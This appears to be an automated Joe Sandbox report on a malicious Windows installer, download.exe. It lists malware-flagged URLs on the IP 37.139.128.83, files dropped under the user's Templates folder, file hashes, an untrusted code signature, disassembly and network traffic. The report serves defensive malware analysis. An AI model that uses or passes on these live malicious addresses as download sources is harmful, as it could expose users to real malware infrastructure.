          http://37.139.128.83/2M100%Avira URL Cloudmalware
          http://37.139.128.83/2W7100%Avira URL Cloudmalware
          http://37.139.128.83/2R2100%Avira URL Cloudmalware
          http://37.139.128.83/2e100%Avira URL Cloudmalware
          http://37.139.128.83/l100%Avira URL Cloudmalware
          http://www.avast.com0/0%Avira URL Cloudsafe
          http://37.139.128.83/2gsLMEM8100%Avira URL Cloudmalware
          http://37.139.128.83/2$2100%Avira URL Cloudmalware
          http://37.139.128.83/262hk100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://37.139.128.83/2false
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://37.139.128.83/2-2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://nsis.sf.net/NSIS_Errordownload.exefalse
            		high
            http://37.139.128.83/2MCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2DataCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2kCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2R2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2W7CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2eCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.avast.com0/lang-1032.dll.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://37.139.128.83/lCasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://nsis.sf.net/NSIS_ErrorErrordownload.exefalse
              		high
              http://37.139.128.83/2gsLMEM8CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://37.139.128.83/2$2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://37.139.128.83/262hkCasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              37.139.128.83
              		unknownGermany
              		10753LVLT-10753USfalse

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830512
              Start date and time:2023-03-20 13:11:48 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 17m 48s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:download.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@4/5@0/1
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 21.3% (good quality ratio 20.9%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.4%
              HCA Information:
              • Successful, ratio: 78%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com
              • Execution Graph export aborted for target CasPol.exe, PID 924 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll

              Download File
              Process:C:\Users\user\Desktop\download.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):11776
              Entropy (8bit):5.825582780706362
              Encrypted:false
              SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
              MD5:FBE295E5A1ACFBD0A6271898F885FE6A
              SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
              SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
              SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\Afreager.For

              Download File
              Process:C:\Users\user\Desktop\download.exe
              File Type:data
              Category:dropped
              Size (bytes):310762
              Entropy (8bit):7.153872132508062
              Encrypted:false
              SSDEEP:6144:gjumg/DuSWsGx6RZLOMqkcjpwn2+3VJInGwhTFLI:gjumgbhWsGWZ+kcj2n2OJInJhTS
              MD5:A1C8FEE704DB305175D7A96481B66C73
              SHA1:F26BE75182187BB5AA73C170605CF171D62DC023
              SHA-256:004CC2CA7789AB32D71678F5174DFC0F8EF1BA70A457929037E8CE0E4FD625C2
              SHA-512:4F5865B975DDD54A7770D89A28ADD620C5A675225F8F7974E68A6173B33C6FCA853D98AD1E2B054147B2ACD6C810BF90A252C30034973AB08B9CBACD69E6B965
              Malicious:false
              Reputation:low
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\Poserne\Bedugget39.Rus

              Download File
              Process:C:\Users\user\Desktop\download.exe
              File Type:data
              Category:dropped
              Size (bytes):142071
              Entropy (8bit):7.998708530523099
              Encrypted:true
              SSDEEP:3072:NZcIfJJvbMxWCmEblH1ZC0+UM53+9I1dPg4kh89+08iFRbleoK:5DMxW4fz1e3+9Sg9Z1iFRleoK
              MD5:2CB77C7D9E16C0EF410FA8BC1CC1185A
              SHA1:0FCBA04A0B4B4563D62A073080E173590BEEBEDD
              SHA-256:A0BFB53FAD74C41F699F171902C1D6A0AC33A81963697A3F674234B2FF36203A
              SHA-512:33FDB3488F9BF085D7CDA649984BAE271194ECB64B569B5BDB1D09DE48C5D5407D75CDC2EA1A59E8E199F821CE4DA5F101D0A7CAA44E544E78C8D8507B6BC751
              Malicious:false
              Preview:>2'...JuK.(p@wC..D.5i....C....M%.*..O.0D.]...N.........%...*xu...k).~.Pz..1/....*..}a.........._........`.a.k.N%Ze..a..o~..=..\...^'...v/.\K...\.....5.......B..{.A..t..vh.....sl}*...Fft>..`....`.>.27(...J..........u{..csucM...a.V.'..a<.N3f.$......%@h8G..).G.>..M{....o...3..~X...w.AS.X...7.Y...v2..+....!u.... n&..vt..FR#s..w.j...........}...J...sA..w.......L@....+X3dq(.; ...k|....i...G.....z~sF`Q}a....[..Q...I.........A..[.?...i.D..e..$d..e..KC....4+J....c...'.">6R.2.0....<R+.}.H0)u49..oK.v._...F).8.e..J..;.!....[.&E...V.....[.%.H....p3..*.....M.!.`,WX..J....an.e..h.u%P...{.....s...Q.._/.e?..R,..$)..N.^.P..Z\...mj8*D.<3...ke...j...W...9..7D.I?...Zp|.3.......M.s.S.4....!l.].aW.=v..Q...9..?...u...0.N....Sg....~..8....,.[./......8P\....S..k.....\.._...[=.P.....d./gKdP-_.5BU..u2u6x...)..E..`.{..@.....!.......g.j.r.\.6.\.+...vr.b..oE..h.;..I.,...(......=.d..p./lr)*...bH....gjJ..........:.x...K)xh.C...../....L..~B..Vh..l.zb.V.6qm...p..ER

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll

              Download File
              Process:C:\Users\user\Desktop\download.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):178696
              Entropy (8bit):4.4006904456537335
              Encrypted:false
              SSDEEP:3072:A8kCKqgt37ZJvMQSOnMIomX6YZVG5dWCR7+nyadqLEzBUyQj2UGBOyj:CvM7yj
              MD5:8AD3A9D8C3DDA9854C13D213D00A8DB8
              SHA1:74283E98F0426DFA7854CEEF9BA43217F39DAB36
              SHA-256:DA07C1D13136E3BAABB9D0598AF99BCB48898BF5DBCA0F0477602BEA957198E9
              SHA-512:C30CA6FA4A62A6383C15AB8B95CD88714AF5C3A63F7FC9C8F767FED18E295B885B765B630831F456D16DB5DA7AA037CA931FCB3F412AB95A8D5E46B1B44497CA
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..`................ ...........................................................................................rdata..p...........................@..@.rsrc...`.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...s...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\microphone-sensitivity-low-symbolic.symbolic.png

              Download File
              Process:C:\Users\user\Desktop\download.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):291
              Entropy (8bit):6.913400639640828
              Encrypted:false
              SSDEEP:6:6v/lhPysSFX/Fd8cy2TY3594VW6yTpm/v4pRw+jGbcnFbp:6v/7yFvn8cGJkv3twD
              MD5:303E1921A67BAE379BC4B36352F391AA
              SHA1:AB361F32C8F1811EC7DB6EB96DAD417753323DB4
              SHA-256:1FC1141E644151384931853426BD36B5293BCAFE380189515850B9CC8FF158D7
              SHA-512:0A355819B8EB530A30710D536CCF6F5AACA7E9050C7CA9F591E31DC8BCBCEFC83EC9EA5B1E3B9356D64A66B42D04A0DD504A97B7AFC6CA35E7CED23A82A74C93
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1N.Q........V6R.H....w...A.`.5v..`mK.ZH.Z8.l`.l._2y......k..8....a.il...8.~.I@.Y.Le.'<G.....a....h...W@.q.3..n..(jb.P.`......X....1..1...!f./..h.~..!..q....3...x.g.7u.{St3......w./Q..g.....*a.]..T..T.~.?.+2.pM......IEND.B`.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.546765550553085
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:download.exe
              File size:680560
              MD5:064fa36da0c2ca360b0906cc5bfe67c6
              SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
              SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
              SHA512:39845a084b66442a1eb114621df67fe6db88e758b4564b79c01eff6a1935dcaba4149f0d3c68e243258b7da5f3ce197a904e226f561a0dfc1377ff22419a6026
              SSDEEP:12288:Z4oLK6+zAX00AF1pOSJe3xbIvli343lKZwIcBRPgYxFz18+t9Z1kU:6PQ00AF1pOSJeBUyqKKrf318U9Z1z
              TLSH:F2E4F15A2B7AC815D065E9F85AE3C50D5C749E14183CABD25BB1283EEBFC2527B0F047
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L......\.................b....9....

              File Icon

              Icon Hash:c4ccc6e6e4f6f640

              Static PE Info

              General

              Entrypoint:0x4031e9
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x5C157F01 [Sat Dec 15 22:24:01 2018 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2

              Authenticode Signature

              Signature Valid:false
              Signature Issuer:CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
              Error Number:-2146762487
              Not Before, Not After
              • 24/01/2023 23:36:10 23/01/2026 23:36:10
              Subject Chain
              • CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
              Version:3
              Thumbprint MD5:F856691DCF4BB6A788E55B70FE388011
              Thumbprint SHA-1:0C5E3286DBBB50FA720930F437DDBC472FF1EFDF
              Thumbprint SHA-256:7BCC618A115B3494BA1A7F1A5EDFACF31559C85478D2F90A7916E2A476BCF411
              Serial:807C3D2B116DDE7C

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080A0h]
              call dword ptr [0040809Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [007A2F4Ch], eax
              je 00007FBDE865E5C3h
              push ebx
              call 00007FBDE866169Ah
              cmp eax, ebx
              je 00007FBDE865E5B9h
              push 00000C00h
              call eax
              mov esi, 00408298h
              push esi
              call 00007FBDE8661616h
              push esi
              call dword ptr [00408098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007FBDE865E59Dh
              push 0000000Ah
              call 00007FBDE866166Eh
              push 00000008h
              call 00007FBDE8661667h
              push 00000006h
              mov dword ptr [007A2F44h], eax
              call 00007FBDE866165Bh
              cmp eax, ebx
              je 00007FBDE865E5C1h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007FBDE865E5B9h
              or byte ptr [007A2F4Fh], 00000040h
              push ebp
              call dword ptr [00408044h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [007A3018h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0079E500h
              call dword ptr [00408178h]
              push 0040A188h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x37c28.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0xa4d400x1530.data
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x60680x6200False0.671875data6.450713900012796IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x80000x12500x1400False0.430078125data5.041636133183931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x3990580x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x3a40000x230000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x3c70000x37c280x37e00False0.4934109340044743data6.083319493650987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x3c74600x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
              RT_ICON0x3d7c880xd177PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
              RT_ICON0x3e4e000x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States
              RT_ICON0x3ee2a80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
              RT_ICON0x3f37300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
              RT_ICON0x3f79580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
              RT_ICON0x3f9f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
              RT_ICON0x3fafa80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
              RT_ICON0x3fbe500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
              RT_ICON0x3fc7d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
              RT_ICON0x3fd0800x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
              RT_ICON0x3fd6e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
              RT_ICON0x3fdc500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
              RT_ICON0x3fe0b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
              RT_ICON0x3fe3a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
              RT_DIALOG0x3fe4c80x100dataEnglishUnited States
              RT_DIALOG0x3fe5c80x11cdataEnglishUnited States
              RT_DIALOG0x3fe6e80xc4dataEnglishUnited States
              RT_DIALOG0x3fe7b00x60dataEnglishUnited States
              RT_GROUP_ICON0x3fe8100xd8dataEnglishUnited States
              RT_MANIFEST0x3fe8e80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
              USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 20, 2023 13:16:46.897514105 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:46.916491985 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.916826963 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:46.917243958 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:46.943846941 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.943917990 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.943964958 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.944006920 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.944037914 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:46.944081068 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:46.944143057 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:46.944204092 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:52.480920076 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:52.481168032 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:56.963512897 CET4979280192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:56.963851929 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:56.981890917 CET804979237.139.128.83192.168.11.20
              Mar 20, 2023 13:16:56.981976986 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:56.982162952 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:56.982340097 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:57.030054092 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:57.030136108 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:57.030189991 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:57.030237913 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:57.030291080 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:16:57.030379057 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:57.030380011 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:16:57.030443907 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:02.530766964 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:17:02.531013012 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.039050102 CET4979580192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.039249897 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.057694912 CET804979537.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.057790995 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.058085918 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.058161974 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.129527092 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.129926920 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.143343925 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.143439054 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.143497944 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.143510103 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.143595934 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:07.143606901 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.143656015 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:07.143703938 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:12.658093929 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:12.658453941 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.161452055 CET4979880192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.161731958 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.179919958 CET804979837.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.179985046 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.180273056 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.180488110 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.208664894 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.208734035 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.208784103 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.208827019 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.208869934 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:17.208889008 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.208889961 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:17.208966970 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:22.709000111 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:22.709415913 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.221820116 CET4980080192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.222153902 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.239955902 CET804980037.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.240132093 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.240246058 CET4980180192.168.11.2037.139.128.83
